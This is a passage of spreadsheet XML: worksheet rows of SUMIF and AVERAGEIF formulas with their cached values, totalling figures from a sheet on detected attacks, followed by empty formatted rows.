        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ78" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR78" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS78" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT78" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY78" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ78" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA78" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC78" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2</v>
      </c>
      <c r="BD78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE78" s="4" t="str">
        <f t="shared" si="23"/>
        <v>2 (2)</v>
      </c>
      <c r="BF78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI78" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ78" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK78" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL78" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO78" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>100</v>
      </c>
      <c r="BP78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>100</v>
      </c>
      <c r="BQ78" s="4" t="str">
        <f t="shared" si="25"/>
        <v>100 (100)</v>
      </c>
      <c r="BR78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS78" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT78" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU78" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B78,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>100</v>
      </c>
      <c r="BV78" s="292">
        <v>0</v>
      </c>
      <c r="BW78" s="322">
        <v>0</v>
      </c>
      <c r="BX78" s="4" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY78" s="12">
        <v>0</v>
      </c>
      <c r="BZ78" s="13">
        <v>0</v>
      </c>
      <c r="CA78" s="394">
        <v>0</v>
      </c>
      <c r="CB78" s="288">
        <v>0</v>
      </c>
      <c r="CC78" s="4">
        <v>0</v>
      </c>
      <c r="CD78" s="4" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE78" s="4">
        <v>0</v>
      </c>
      <c r="CF78" s="4">
        <v>0</v>
      </c>
      <c r="CG78" s="13">
        <v>0</v>
      </c>
      <c r="CH78" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:98" s="4" customFormat="1" ht="15" customHeight="1">
      <c r="A79" s="660" t="s">
        <v>176</v>
      </c>
      <c r="B79" s="661"/>
      <c r="C79" s="662"/>
      <c r="D79" s="11">
        <f>SUM(D3:D78)</f>
        <v>110</v>
      </c>
      <c r="E79" s="11">
        <f>SUM(E3:E78)</f>
        <v>3573695</v>
      </c>
      <c r="F79" s="600" t="str">
        <f>D79&amp;" ("&amp;E79&amp;")"</f>
        <v>110 (3573695)</v>
      </c>
      <c r="G79" s="603">
        <f>SUM(G3:G78)</f>
        <v>37259</v>
      </c>
      <c r="H79" s="604">
        <f>SUM(H3:H78)</f>
        <v>13523</v>
      </c>
      <c r="I79" s="604" t="str">
        <f t="shared" si="15"/>
        <v>13523 (37259)</v>
      </c>
      <c r="J79" s="600">
        <f>SUM(J3:J78)</f>
        <v>171</v>
      </c>
      <c r="K79" s="601">
        <f>SUMPRODUCT($D3:$D$78,K3:K78)/$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="L79" s="605">
        <f>SUM(L$3:L$78)</f>
        <v>13051</v>
      </c>
      <c r="M79" s="604">
        <f>SUM(M3:M78)</f>
        <v>13179</v>
      </c>
      <c r="N79" s="604">
        <f>SUM(N3:N78)</f>
        <v>4968</v>
      </c>
      <c r="O79" s="604" t="str">
        <f t="shared" si="16"/>
        <v>4968 (13179)</v>
      </c>
      <c r="P79" s="600">
        <f>SUM(P3:P78)</f>
        <v>301</v>
      </c>
      <c r="Q79" s="601">
        <f>SUMPRODUCT($D3:$D$78,Q3:Q78)/$D$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="R79" s="605">
        <f>SUM(R$3:R$78)</f>
        <v>3229</v>
      </c>
      <c r="S79" s="606">
        <f>SUM(S3:S78)</f>
        <v>50438</v>
      </c>
      <c r="T79" s="600">
        <f>SUM(T3:T78)</f>
        <v>18491</v>
      </c>
      <c r="U79" s="600" t="str">
        <f t="shared" si="17"/>
        <v>18491 (50438)</v>
      </c>
      <c r="V79" s="600">
        <f>SUM(V3:V78)</f>
        <v>472</v>
      </c>
      <c r="W79" s="601">
        <f>SUMPRODUCT($D3:$D$78,W3:W78)/$D$79</f>
        <v>0.8</v>
      </c>
      <c r="X79" s="605">
        <f>SUM(X$3:X$78)</f>
        <v>15080</v>
      </c>
      <c r="Y79" s="604">
        <f>SUM(Y3:Y78)</f>
        <v>1799319</v>
      </c>
      <c r="Z79" s="604">
        <f>SUM(Z3:Z78)</f>
        <v>383176</v>
      </c>
      <c r="AA79" s="604" t="str">
        <f t="shared" si="18"/>
        <v>383176 (1799319)</v>
      </c>
      <c r="AB79" s="604">
        <f>SUM(AB3:AB78)</f>
        <v>472</v>
      </c>
      <c r="AC79" s="601">
        <f>SUMPRODUCT($D3:$D$78,AC3:AC78)/$D$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="AD79" s="605">
        <f>SUM(AD$3:AD$78)</f>
        <v>206693</v>
      </c>
      <c r="AE79" s="604">
        <f>SUM(AE3:AE78)</f>
        <v>367811</v>
      </c>
      <c r="AF79" s="604">
        <f>SUM(AF3:AF78)</f>
        <v>192858</v>
      </c>
      <c r="AG79" s="604" t="str">
        <f t="shared" si="19"/>
        <v>192858 (367811)</v>
      </c>
      <c r="AH79" s="604">
        <f>SUM(AH3:AH78)</f>
        <v>1056</v>
      </c>
      <c r="AI79" s="601">
        <f>SUMPRODUCT($D3:$D$78,AI3:AI78)/$D$79</f>
        <v>1</v>
      </c>
      <c r="AJ79" s="605">
        <f>SUM(AJ$3:AJ$78)</f>
        <v>127698</v>
      </c>
      <c r="AK79" s="604">
        <f>SUM(AK3:AK78)</f>
        <v>2157395</v>
      </c>
      <c r="AL79" s="604">
        <f>SUM(AL3:AL78)</f>
        <v>572909</v>
      </c>
      <c r="AM79" s="604" t="str">
        <f t="shared" si="20"/>
        <v>572909 (2157395)</v>
      </c>
      <c r="AN79" s="604">
        <f>SUM(AN3:AN78)</f>
        <v>2013</v>
      </c>
      <c r="AO79" s="601">
        <f>SUMPRODUCT($D3:$D$78,AO3:AO78)/$D$79</f>
        <v>1</v>
      </c>
      <c r="AP79" s="605">
        <f>SUM(AP$3:AP$78)</f>
        <v>268349</v>
      </c>
      <c r="AQ79" s="603">
        <f>SUM(AQ3:AQ78)</f>
        <v>16</v>
      </c>
      <c r="AR79" s="604">
        <f>SUM(AR3:AR78)</f>
        <v>2</v>
      </c>
      <c r="AS79" s="604" t="str">
        <f t="shared" si="21"/>
        <v>2 (16)</v>
      </c>
      <c r="AT79" s="600">
        <f>SUM(AT3:AT78)</f>
        <v>2</v>
      </c>
      <c r="AU79" s="601">
        <f>SUMPRODUCT($D3:$D$78,AU3:AU78)/$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="AV79" s="605">
        <f>SUM(AV$3:AV$78)</f>
        <v>1</v>
      </c>
      <c r="AW79" s="604">
        <f>SUM(AW3:AW78)</f>
        <v>25704</v>
      </c>
      <c r="AX79" s="604">
        <f>SUM(AX3:AX78)</f>
        <v>8207</v>
      </c>
      <c r="AY79" s="604" t="str">
        <f t="shared" si="22"/>
        <v>8207 (25704)</v>
      </c>
      <c r="AZ79" s="604">
        <f>SUM(AZ3:AZ78)</f>
        <v>518</v>
      </c>
      <c r="BA79" s="601">
        <f>SUMPRODUCT($D3:$D$78,BA3:BA78)/$D$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="BB79" s="605">
        <f>SUM(BB$3:BB$78)</f>
        <v>4168</v>
      </c>
      <c r="BC79" s="606">
        <f>SUM(BC3:BC78)</f>
        <v>76126</v>
      </c>
      <c r="BD79" s="600">
        <f>SUM(BD3:BD78)</f>
        <v>26696</v>
      </c>
      <c r="BE79" s="600" t="str">
        <f t="shared" si="23"/>
        <v>26696 (76126)</v>
      </c>
      <c r="BF79" s="600">
        <f>SUM(BF3:BF78)</f>
        <v>988</v>
      </c>
      <c r="BG79" s="601">
        <f>SUMPRODUCT($D3:$D$78,BG3:BG78)/$D$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="BH79" s="605">
        <f>SUM(BH$3:BH$78)</f>
        <v>16148</v>
      </c>
      <c r="BI79" s="603">
        <f>SUM(BI3:BI78)</f>
        <v>656996</v>
      </c>
      <c r="BJ79" s="604">
        <f>SUM(BJ3:BJ78)</f>
        <v>655847</v>
      </c>
      <c r="BK79" s="604" t="str">
        <f t="shared" si="24"/>
        <v>655847 (656996)</v>
      </c>
      <c r="BL79" s="600">
        <f>SUM(BL3:BL78)</f>
        <v>220</v>
      </c>
      <c r="BM79" s="601">
        <f>SUMPRODUCT($D3:$D$78,BM3:BM78)/$D$79</f>
        <v>0.6</v>
      </c>
      <c r="BN79" s="605">
        <f>SUM(BN$3:BN$78)</f>
        <v>654936</v>
      </c>
      <c r="BO79" s="603">
        <f>SUM(BO3:BO78)</f>
        <v>1989445</v>
      </c>
      <c r="BP79" s="600">
        <f>SUM(BP3:BP78)</f>
        <v>1977351</v>
      </c>
      <c r="BQ79" s="600" t="str">
        <f t="shared" si="25"/>
        <v>1977351 (1989445)</v>
      </c>
      <c r="BR79" s="600">
        <f>SUM(BR3:BR78)</f>
        <v>220</v>
      </c>
      <c r="BS79" s="600">
        <f>SUM(BS3:BS78)</f>
        <v>339</v>
      </c>
      <c r="BT79" s="601">
        <f>SUMPRODUCT($D3:$D$78,BT3:BT78)/$D$79</f>
        <v>0.95454545454545459</v>
      </c>
      <c r="BU79" s="605">
        <f>SUM(BU3:BU78)</f>
        <v>1022206</v>
      </c>
      <c r="BV79" s="603">
        <f>SUM(BV3:BV78)</f>
        <v>3993092</v>
      </c>
      <c r="BW79" s="604">
        <f>SUM(BW3:BW78)</f>
        <v>2558482</v>
      </c>
      <c r="BX79" s="604" t="str">
        <f t="shared" ref="BX79" si="30">BW79 &amp; " (" &amp; BV79 &amp; ")"</f>
        <v>2558482 (3993092)</v>
      </c>
      <c r="BY79" s="600">
        <f>SUM(BY3:BY78)</f>
        <v>172</v>
      </c>
      <c r="BZ79" s="601">
        <f>SUMPRODUCT($D3:$D$78,BZ3:BZ78)/$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="CA79" s="605">
        <f>SUM(CA$3:CA$78)</f>
        <v>2488158</v>
      </c>
      <c r="CB79" s="603">
        <f>SUM(CB3:CB78)</f>
        <v>7986184</v>
      </c>
      <c r="CC79" s="600">
        <f>SUM(CC3:CC78)</f>
        <v>5046652</v>
      </c>
      <c r="CD79" s="600" t="str">
        <f t="shared" ref="CD79" si="31">CC79 &amp; " (" &amp; CB79 &amp; ")"</f>
        <v>5046652 (7986184)</v>
      </c>
      <c r="CE79" s="600">
        <f>SUM(CE3:CE78)</f>
        <v>172</v>
      </c>
      <c r="CF79" s="600">
        <f>SUM(CF3:CF78)</f>
        <v>89</v>
      </c>
      <c r="CG79" s="601">
        <f>SUMPRODUCT($D3:$D$78,CG3:CG78)/$D$79</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="CH79" s="605">
        <f>SUM(CH3:CH78)</f>
        <v>2488158</v>
      </c>
      <c r="CI79" s="3"/>
      <c r="CJ79" s="3"/>
      <c r="CK79" s="3"/>
      <c r="CL79" s="3"/>
      <c r="CM79" s="3"/>
      <c r="CN79" s="3"/>
      <c r="CO79" s="3"/>
      <c r="CP79" s="3"/>
      <c r="CQ79" s="3"/>
      <c r="CR79" s="3"/>
      <c r="CS79" s="3"/>
      <c r="CT79" s="3"/>
    </row>
    <row r="80" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A80" s="15"/>
      <c r="B80" s="3"/>
      <c r="C80" s="3"/>
      <c r="D80" s="1"/>
      <c r="E80" s="1"/>
      <c r="F80" s="3"/>
      <c r="G80" s="3"/>
      <c r="H80" s="3"/>
      <c r="I80" s="3"/>
      <c r="J80" s="3"/>
      <c r="K80" s="678" t="s">
        <v>4466</v>
      </c>
      <c r="L80" s="678"/>
      <c r="M80" s="678"/>
      <c r="N80" s="678"/>
      <c r="O80" s="678"/>
      <c r="P80" s="678"/>
      <c r="Q80" s="678"/>
      <c r="R80" s="1"/>
      <c r="S80" s="1"/>
      <c r="T80" s="1"/>
      <c r="U80" s="1"/>
      <c r="V80" s="1"/>
      <c r="W80" s="1"/>
      <c r="X80" s="1"/>
      <c r="Y80" s="1"/>
      <c r="Z80" s="1"/>
      <c r="AA80" s="1"/>
      <c r="AB80" s="1"/>
      <c r="AC80" s="1"/>
      <c r="AD80" s="1"/>
      <c r="AE80" s="3"/>
      <c r="AF80" s="3"/>
      <c r="AG80" s="3"/>
      <c r="AH80" s="3"/>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602"/>
      <c r="BJ80" s="335"/>
      <c r="BK80" s="335"/>
      <c r="BL80" s="335"/>
      <c r="BM80" s="335"/>
      <c r="BN80" s="335"/>
      <c r="BO80" s="335"/>
      <c r="BP80" s="335"/>
      <c r="BQ80" s="335"/>
      <c r="BR80" s="335"/>
      <c r="BS80" s="335"/>
      <c r="BT80" s="335"/>
      <c r="BU80" s="335"/>
      <c r="BV80" s="335"/>
      <c r="BW80" s="335"/>
      <c r="BX80" s="335"/>
      <c r="BY80" s="335"/>
      <c r="BZ80" s="335"/>
      <c r="CA80" s="335"/>
      <c r="CB80" s="335"/>
      <c r="CC80" s="335"/>
      <c r="CD80" s="335"/>
      <c r="CE80" s="335"/>
      <c r="CF80" s="335"/>
      <c r="CG80" s="335"/>
      <c r="CH80" s="335"/>
      <c r="CI80" s="1"/>
      <c r="CJ80" s="1"/>
      <c r="CK80" s="1"/>
      <c r="CL80" s="1"/>
      <c r="CM80" s="1"/>
      <c r="CN80" s="1"/>
      <c r="CO80" s="1"/>
      <c r="CP80" s="1"/>
      <c r="CQ80" s="1"/>
      <c r="CR80" s="1"/>
      <c r="CS80" s="1"/>
      <c r="CT80" s="1"/>
    </row>
    <row r="81" spans="1:98" s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A81" s="15"/>
      <c r="B81" s="3"/>
      <c r="C81" s="3"/>
      <c r="D81" s="1"/>
      <c r="E81" s="1"/>
      <c r="F81" s="3"/>
      <c r="G81" s="3"/>
      <c r="H81" s="670" t="s">
        <v>4458</v>
      </c>
      <c r="I81" s="670"/>
      <c r="J81" s="670"/>
      <c r="K81" s="670"/>
      <c r="L81" s="670"/>
      <c r="M81" s="670"/>
      <c r="N81" s="670"/>
      <c r="O81" s="670"/>
      <c r="P81" s="670"/>
      <c r="Q81" s="670"/>
      <c r="R81" s="1"/>
      <c r="S81" s="1"/>
      <c r="T81" s="1"/>
      <c r="U81" s="1"/>
      <c r="V81" s="1"/>
      <c r="W81" s="1"/>
      <c r="X81" s="1"/>
      <c r="Y81" s="1"/>
      <c r="Z81" s="1"/>
      <c r="AA81" s="1"/>
      <c r="AB81" s="1"/>
      <c r="AC81" s="1"/>
      <c r="AD81" s="1"/>
      <c r="AE81" s="3"/>
      <c r="AF81" s="3"/>
      <c r="AG81" s="3"/>
      <c r="AH81" s="3"/>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335"/>
      <c r="BM81" s="1"/>
      <c r="BN81" s="1"/>
      <c r="BO81" s="1"/>
      <c r="BP81" s="1"/>
      <c r="BQ81" s="1"/>
      <c r="BR81" s="335"/>
      <c r="BS81" s="335"/>
      <c r="BT81" s="335"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A82" s="15"/>
      <c r="B82" s="3"/>
      <c r="C82" s="3"/>
      <c r="D82" s="1"/>
      <c r="E82" s="1"/>
      <c r="F82" s="3"/>
      <c r="G82" s="3"/>
      <c r="H82" s="3"/>
      <c r="I82" s="3"/>
      <c r="J82" s="3"/>
      <c r="K82" s="1"/>
      <c r="L82" s="1"/>
      <c r="M82" s="1"/>
      <c r="N82" s="1"/>
      <c r="O82" s="1"/>
      <c r="P82" s="1"/>
      <c r="Q82" s="1"/>
      <c r="R82" s="1"/>
      <c r="S82" s="1"/>
      <c r="T82" s="1"/>
      <c r="U82" s="1"/>
      <c r="V82" s="1"/>
      <c r="W82" s="1"/>
      <c r="X82" s="1"/>
      <c r="Y82" s="1"/>
      <c r="Z82" s="1"/>
      <c r="AA82" s="1"/>
      <c r="AB82" s="1"/>
      <c r="AC82" s="1"/>
      <c r="AD82" s="1"/>
      <c r="AE82" s="3"/>
      <c r="AF82" s="3"/>
      <c r="AG82" s="3"/>
      <c r="AH82" s="3"/>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335"/>
      <c r="BM82" s="1"/>
      <c r="BN82" s="1"/>
      <c r="BO82" s="1"/>
      <c r="BP82" s="1"/>
      <c r="BQ82" s="1"/>
      <c r="BR82" s="335"/>
      <c r="BS82" s="335"/>
      <c r="BT82" s="335"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A83" s="15"/>
      <c r="B83" s="3"/>
      <c r="C83" s="3"/>
      <c r="D83" s="1"/>
      <c r="E83" s="1"/>
      <c r="F83" s="3"/>
      <c r="G83" s="3"/>
      <c r="H83" s="3"/>
      <c r="I83" s="3"/>
      <c r="J83" s="3"/>
      <c r="K83" s="1"/>
      <c r="L83" s="1"/>
      <c r="M83" s="1"/>
      <c r="N83" s="1"/>
      <c r="O83" s="1"/>
      <c r="P83" s="1"/>
      <c r="Q83" s="1"/>
      <c r="R83" s="1"/>
      <c r="S83" s="1"/>
      <c r="T83" s="1"/>
      <c r="U83" s="1"/>
      <c r="V83" s="1"/>
      <c r="W83" s="1"/>
      <c r="X83" s="1"/>
      <c r="Y83" s="1"/>
      <c r="Z83" s="1"/>
      <c r="AA83" s="1"/>
      <c r="AB83" s="1"/>
      <c r="AC83" s="1"/>
      <c r="AD83" s="1"/>
      <c r="AE83" s="3"/>
      <c r="AF83" s="3"/>
      <c r="AG83" s="3"/>
      <c r="AH83" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A84" s="15"/>
      <c r="B84" s="3"/>
      <c r="C84" s="3"/>
      <c r="D84" s="1"/>
      <c r="E84" s="1"/>
      <c r="F84" s="3"/>
      <c r="G84" s="3"/>
      <c r="H84" s="3"/>
      <c r="I84" s="3"/>
      <c r="J84" s="3"/>
      <c r="K84" s="1"/>
      <c r="L84" s="1"/>
      <c r="M84" s="1"/>
      <c r="N84" s="1"/>
      <c r="O84" s="1"/>
      <c r="P84" s="1"/>
      <c r="Q84" s="1"/>
      <c r="R84" s="1"/>
      <c r="S84" s="1"/>
      <c r="T84" s="1"/>
      <c r="U84" s="1"/>
      <c r="V84" s="1"/>
      <c r="W84" s="1"/>
      <c r="X84" s="1"/>
      <c r="Y84" s="1"/>
      <c r="Z84" s="1"/>
      <c r="AA84" s="1"/>
      <c r="AB84" s="1"/>
      <c r="AC84" s="1"/>
      <c r="AD84" s="1"/>
      <c r="AE84" s="3"/>
      <c r="AF84" s="3"/>
      <c r="AG84" s="3"/>
      <c r="AH84" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A85" s="15"/>
      <c r="B85" s="3"/>
      <c r="C85" s="3"/>
      <c r="D85" s="1"/>
      <c r="E85" s="1"/>
      <c r="F85" s="3"/>
      <c r="G85" s="3"/>
      <c r="H85" s="3"/>
      <c r="I85" s="3"/>
      <c r="J85" s="3"/>
      <c r="K85" s="1"/>
      <c r="L85" s="1"/>
      <c r="M85" s="1"/>
      <c r="N85" s="1"/>
      <c r="O85" s="1"/>
      <c r="P85" s="1"/>
      <c r="Q85" s="1"/>
      <c r="R85" s="1"/>
      <c r="S85" s="1"/>
      <c r="T85" s="1"/>
      <c r="U85" s="1"/>
      <c r="V85" s="1"/>
      <c r="W85" s="1"/>
      <c r="X85" s="1"/>
      <c r="Y85" s="1"/>
      <c r="Z85" s="1"/>
      <c r="AA85" s="1"/>
      <c r="AB85" s="1"/>
      <c r="AC85" s="1"/>
      <c r="AD85" s="1"/>
      <c r="AE85" s="3"/>
      <c r="AF85" s="3"/>
      <c r="AG85" s="3"/>
      <c r="AH85" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A86" s="15"/>
      <c r="B86" s="3"/>
      <c r="C86" s="3"/>
      <c r="D86" s="1"/>
      <c r="E86" s="1"/>
      <c r="F86" s="3"/>
      <c r="G86" s="3"/>
      <c r="H86" s="3"/>
      <c r="I86" s="3"/>
      <c r="J86" s="3"/>
      <c r="K86" s="1"/>
      <c r="L86" s="1"/>
      <c r="M86" s="1"/>
      <c r="N86" s="1"/>
      <c r="O86" s="1"/>
      <c r="P86" s="1"/>
      <c r="Q86" s="1"/>
      <c r="R86" s="1"/>
      <c r="S86" s="1"/>
      <c r="T86" s="1"/>
      <c r="U86" s="1"/>
      <c r="V86" s="1"/>
      <c r="W86" s="1"/>
      <c r="X86" s="1"/>
      <c r="Y86" s="1"/>
      <c r="Z86" s="1"/>
      <c r="AA86" s="1"/>
      <c r="AB86" s="1"/>
      <c r="AC86" s="1"/>
      <c r="AD86" s="1"/>
      <c r="AE86" s="3"/>
      <c r="AF86" s="3"/>
      <c r="AG86" s="3"/>
      <c r="AH86" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A87" s="15"/>
      <c r="B87" s="3"/>
      <c r="C87" s="3"/>
      <c r="D87" s="1"/>
      <c r="E87" s="1"/>
      <c r="F87" s="3"/>
      <c r="G87" s="3"/>
      <c r="H87" s="3"/>
      <c r="I87" s="3"/>
      <c r="J87" s="3"/>
      <c r="K87" s="1"/>
      <c r="L87" s="1"/>
      <c r="M87" s="1"/>
      <c r="N87" s="1"/>
      <c r="O87" s="1"/>
      <c r="P87" s="1"/>
      <c r="Q87" s="1"/>
      <c r="R87" s="1"/>
      <c r="S87" s="1"/>
      <c r="T87" s="1"/>
      <c r="U87" s="1"/>
      <c r="V87" s="1"/>
      <c r="W87" s="1"/>
      <c r="X87" s="1"/>
      <c r="Y87" s="1"/>
      <c r="Z87" s="1"/>
      <c r="AA87" s="1"/>
      <c r="AB87" s="1"/>
      <c r="AC87" s="1"/>
      <c r="AD87" s="1"/>
      <c r="AE87" s="3"/>
      <c r="AF87" s="3"/>
      <c r="AG87" s="3"/>
      <c r="AH87" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A88" s="15"/>
      <c r="B88" s="3"/>
      <c r="C88" s="3"/>
      <c r="D88" s="1"/>
      <c r="E88" s="1"/>
      <c r="F88" s="3"/>
      <c r="G88" s="3"/>
      <c r="H88" s="3"/>
      <c r="I88" s="3"/>
      <c r="J88" s="3"/>
      <c r="K88" s="1"/>
      <c r="L88" s="1"/>
      <c r="M88" s="1"/>
      <c r="N88" s="1"/>
      <c r="O88" s="1"/>
      <c r="P88" s="1"/>
      <c r="Q88" s="1"/>
      <c r="R88" s="1"/>
      <c r="S88" s="1"/>
      <c r="T88" s="1"/>
      <c r="U88" s="1"/>
      <c r="V88" s="1"/>
      <c r="W88" s="1"/>
      <c r="X88" s="1"/>
      <c r="Y88" s="1"/>
      <c r="Z88" s="1"/>
      <c r="AA88" s="1"/>
      <c r="AB88" s="1"/>
      <c r="AC88" s="1"/>
      <c r="AD88" s="1"/>
      <c r="AE88" s="3"/>
      <c r="AF88" s="3"/>
      <c r="AG88" s="3"/>
      <c r="AH88" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A89" s="15"/>
      <c r="B89" s="3"/>
      <c r="C89" s="3"/>
      <c r="D89" s="1"/>
      <c r="E89" s="1"/>
      <c r="F89" s="3"/>
      <c r="G89" s="3"/>
      <c r="H89" s="3"/>
      <c r="I89" s="3"/>
      <c r="J89" s="3"/>
      <c r="K89" s="1"/>
      <c r="L89" s="1"/>
      <c r="M89" s="1"/>
      <c r="N89" s="1"/>
      <c r="O89" s="1"/>
      <c r="P89" s="1"/>
      <c r="Q89" s="1"/>
      <c r="R89" s="1"/>
      <c r="S89" s="1"/>
      <c r="T89" s="1"/>
      <c r="U89" s="1"/>
      <c r="V89" s="1"/>
      <c r="W89" s="1"/>
      <c r="X89" s="1"/>
      <c r="Y89" s="1"/>
      <c r="Z89" s="1"/>
      <c r="AA89" s="1"/>
      <c r="AB89" s="1"/>
      <c r="AC89" s="1"/>
      <c r="AD89" s="1"/>
      <c r="AE89" s="3"/>
      <c r="AF89" s="3"/>
      <c r="AG89" s="3"/>
      <c r="AH89" s="3"/>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s="7" customFormat="1" ht="39.950000000000003" customHeight="1">
      <c r="A90" s="15"/>
      <c r="B90" s="3"/>
      <c r="C90" s="3"/>
      <c r="D90" s="1"/>
      <c r="E90" s="1"/>
